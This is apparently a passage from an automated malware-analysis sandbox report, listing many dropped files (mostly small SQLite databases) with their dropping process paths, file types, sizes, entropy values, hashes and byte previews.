                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):25
                                                                                Entropy (8bit):4.053660689688185
                                                                                Encrypted:false
                                                                                SSDEEP:3:SEFNwrT/n:Srj
                                                                                MD5:34B0D678425A7C109A0CDBEF2C758478
                                                                                SHA1:D8DA5767C9E11639DD901EE2DA90F0655E3ED1CB
                                                                                SHA-256:AECAA358618F232A26D0D1310A570FC2C7DD221017058402BA585E5A55EBDABD
                                                                                SHA-512:3433FBF8A457E71127D8F0AADD61F00A1A6BE84CA1606A342C051F86443390D40A7BE2C05A579A31801B15382F4FFFAE6CAD184E2F4D0B455A5C8F25F401F00E
                                                                                Malicious:false
                                                                                Preview:gAW30eZa0JkgZlmBNE3DNbVmm
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
